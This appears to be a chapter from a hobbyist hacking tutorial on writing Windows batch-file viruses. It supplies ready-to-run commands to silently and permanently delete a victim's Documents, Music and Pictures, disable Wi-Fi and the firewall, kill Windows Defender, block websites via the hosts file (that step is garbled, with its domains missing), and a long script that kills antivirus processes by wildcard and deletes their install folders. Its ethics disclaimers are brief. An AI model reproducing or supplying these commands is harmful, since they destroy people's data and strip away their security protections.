By now you should have a pretty good grip on working with batch files. The time has come for you to fly out of the nest. Presented below are a few ideas for things that you can make your viruses do.

These commands should work on most Windows 10 systems with default configuration. However, you may need to tweak some of them before they work for you. For example, to kill your victim’s anti-virus, you’ll need to know what anti-virus they have in the first place, only then can you stop it’s process and delete it.

Warning: Executing some of these commands WILL result in permanent loss of data. If you want to try these out, do so in a virtual machine.

Delete important stuff

Damaging personal data is a purely destructive attack motive. The attacker gains nothing but the victim loses something. For better or worse, this is something that batch files really shine at. Batch files can quietly delete vast quantities of data without the victim ever realizing what’s happening until it’s too late. And using the del command means the data is not going to the recycle bin, it’s permanently deleted.

What’s even scarier is that most directories, including the examples below, don’t require admin privileges to access, by default. However, if you are able to run a batch file as an administrator then that opens up the entire system to attack (such as deleting anti-viruses to allow other malware to roam freely).

  • Delete Documents

    del /f /q "%userprofile%\Documents\*.*"
  • Delete Music

    del /f /q "%userprofile%\Music\*.*"
  • Delete Pictures

    del /f /q "%userprofile%\Pictures\*.*"

Disable Important stuff

The fact that windows provides utilities and services that can be accessed through the command line opens up yet another attack vector. Changing important configurations such as registry entries can render a computer unusable.

  • Disable Wi-Fi - Let’s see how we can go about this. First we find out the names of all the network interfaces:

    netsh interface show interface

    This outputs:

    Admin State    State          Type             Interface Name
    Enabled        Disconnected   Dedicated        Ethernet
    Enabled        Connected      Dedicated        VirtualBox Host-Only Network
    Enabled        Connected      Dedicated        Ethernet 2
    Enabled        Connected      Dedicated        Wi-Fi

    For my computer, the wireless interface is simply named Wi-Fi (it may be different for you). And now we can just disable it:

    netsh interface set interface "Wi-Fi" Disable

    And the Wi-Fi stops working and also the Wi-Fi icon disappears from the taskbar.

    It can be re-enabled by using this command: (P.S: Disabling/Enabling interfaces requires admin privileges.)

    netsh interface set interface "Wi-Fi" Enable

    Or through the control panel:

WiFi settings showing hwo to
  • Disable the firewall

    net stop "MpsSvc"
  • Stop Windows Defender

    taskkill /f /t /im "MSASCuiL.exe"
    taskkill /f /t /im "MSASCui.exe"

Block Websites

We can block any website we want by editing the hosts file:

cd "C:\Windows\System32\Drivers\etc"
echo >> "hosts"
echo >> "hosts" is the localhost. The above command tells the computer that it’s going to find on your own device. So the browser doesn’t even bother trying to find out the real IP address of, it just uses localhost, where of course it doesn’t get a reply. You’ll usually want to block both the top level domain as well as the www. subdomain.

This is kind of a shitty thing to do to someone, don’t you think? Maybe you should be a white-hat and make a “virus” that blocks intrusive ads and help protect your victim’s privacy.

Delete all anti-viruses

The following snippet tries to disable and delete all common anti-viruses. It’s really just a hail mary and definitely not the most appropriate way to go about this. You’ll need admin rights to run this. Below you’ll see two types of commands:

  • taskkill: These commands attempt to kill the running anti-virus processes. A bunch of common process names are included below. Note that we’re using the wildcard * in the names. This means, for example, av* will include all the names that begin with ‘av’. So it is possible that a whole lot of innocent process also get caught in the crossfire.
  • RMDIR: These commands simply delete the default installation folders of the anti-viruses.
taskkill /F /IM av* >NUL
taskkill /F /IM fire* >NUL
taskkill /F /IM anti* >NUL
taskkill /F /IM spy* >NUL
taskkill /F /IM bullguard* >NUL
taskkill /F /IM PersFw* >NUL
taskkill /F /IM KAV* >NUL
taskkill /F /IM ZONEALARM* >NUL
taskkill /F /IM SAFEWEB* >NUL
taskkill /F /IM OUTPOST* >NUL
taskkill /F /IM nv* >NUL
taskkill /F /IM nav* >NUL
taskkill /F /IM F-* >NUL
taskkill /F /IM ESAFE* >NUL
taskkill /F /IM cle* >NUL
taskkill /F /IM BLACKICE* >NUL
taskkill /F /IM def* >NUL
taskkill /F /IM kav* >NUL
taskkill /F /IM kav* >NUL
taskkill /F /IM avg* >NUL
taskkill /F /IM ash* >NUL
taskkill /F /IM aswupdsv* >NUL
taskkill /F /IM ewid* >NUL
taskkill /F /IM guar* >NUL
taskkill /F /IM gcasDt* >NUL
taskkill /F /IM msmp* >NUL
taskkill /F /IM mcafe* >NUL
taskkill /F /IM mghtml* >NUL
taskkill /F /IM msiexec* >NUL
taskkill /F /IM outpost* >NUL
taskkill /F /IM isafe* >NUL
taskkill /F /IM zap* >NUL
taskkill /F /IM zauinst* >NUL
taskkill /F /IM upd* >NUL
taskkill /F /IM zlclien* >NUL
taskkill /F /IM minilog* >NUL
taskkill /F /IM norton* >NUL
taskkill /F /IM ccc* >NUL
taskkill /F /IM npfmn* >NUL
taskkill /F /IM loge* >NUL
taskkill /F /IM nisum* >NUL
taskkill /F /IM issvc* >NUL
taskkill /F /IM tmp* >NUL
taskkill /F /IM tmn* >NUL
taskkill /F /IM pcc* >NUL
taskkill /F /IM cpd* >NUL
taskkill /F /IM pop* >NUL
taskkill /F /IM pav* >NUL
taskkill /F /IM padmin* >NUL
taskkill /F /IM panda* >NUL
taskkill /F /IM avsch* >NUL
taskkill /F /IM sche* >NUL
taskkill /F /IM syman* >NUL
taskkill /F /IM virus* >NUL
taskkill /F /IM realm* >NUL
taskkill /F /IM sweep* >NUL
taskkill /F /IM scan* >NUL
taskkill /F /IM ad-* >NUL
taskkill /F /IM safe* >NUL
taskkill /F /IM avas* >NUL
taskkill /F /IM norm* >NUL
taskkill /F /IM offg* >NUL

RMDIR /Q "C:\Program Files\alwils~1" /S >NUL
RMDIR /Q "C:\Program Files\Lavasoft\Ad-awa~1" /S >NUL
RMDIR /Q "C:\Program Files\kasper~1" /S >NUL
RMDIR /Q "C:\Program Files\trojan~1" /S >NUL
RMDIR /Q "C:\Program Files\f-prot95" /S >NUL
RMDIR /Q "C:\Program Files\tbav" /S >NUL
RMDIR /Q "C:\Program Files\avpersonal" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1" /S >NUL
RMDIR /Q "C:\Program Files\Mcafee" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1\Norton~1\Norton~3" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1\Norton~1\speedd~1" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1\Norton~1" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1" /S >NUL
RMDIR /Q "C:\Program Files\avgamsr" /S >NUL
RMDIR /Q "C:\Program Files\avgamsvr" /S >NUL
RMDIR /Q "C:\Program Files\avgemc" /S >NUL
RMDIR /Q "C:\Program Files\avgcc" /S >NUL
RMDIR /Q "C:\Program Files\avgupsvc" /S >NUL
RMDIR /Q "C:\Program Files\grisoft" /S >NUL
RMDIR /Q "C:\Program Files\nood32krn" /S >NUL
RMDIR /Q "C:\Program Files\nood32" /S >NUL
RMDIR /Q "C:\Program Files\nod32" /S >NUL
RMDIR /Q "C:\Program Files\nood32" /S >NUL
RMDIR /Q "C:\Program Files\kav" /S >NUL
RMDIR /Q "C:\Program Files\kavmm" /S >NUL
RMDIR /Q "C:\Program Files\kaspersky" /S >NUL
RMDIR /Q "C:\Program Files\ewidoctrl" /S >NUL
RMDIR /Q "C:\Program Files\guard" /S >NUL
RMDIR /Q "C:\Program Files\ewido" /S >NUL
RMDIR /Q "C:\Program Files\pavprsrv" /S >NUL
RMDIR /Q "C:\Program Files\pavprot" /S >NUL
RMDIR /Q "C:\Program Files\avengine" /S >NUL
RMDIR /Q "C:\Program Files\apvxdwin" /S >NUL
RMDIR /Q "C:\Program Files\webproxy" /S >NUL
RMDIR /Q "C:\Program Files\panda software" /S >NUL

Our journey has only just begun so we must keep moving. It should go without saying that you must use this knowledge ethically. Today’s systems are largely protected from little batch file viruses, but soon we’re going to learn about hacking techniques that can be used to really hurt people and businesses, financially or otherwise. And with that we bid farewell to batch file viruses.

Next up, we’re going to have a little fun and learn about something quite explosive.

Recommended | All

go to top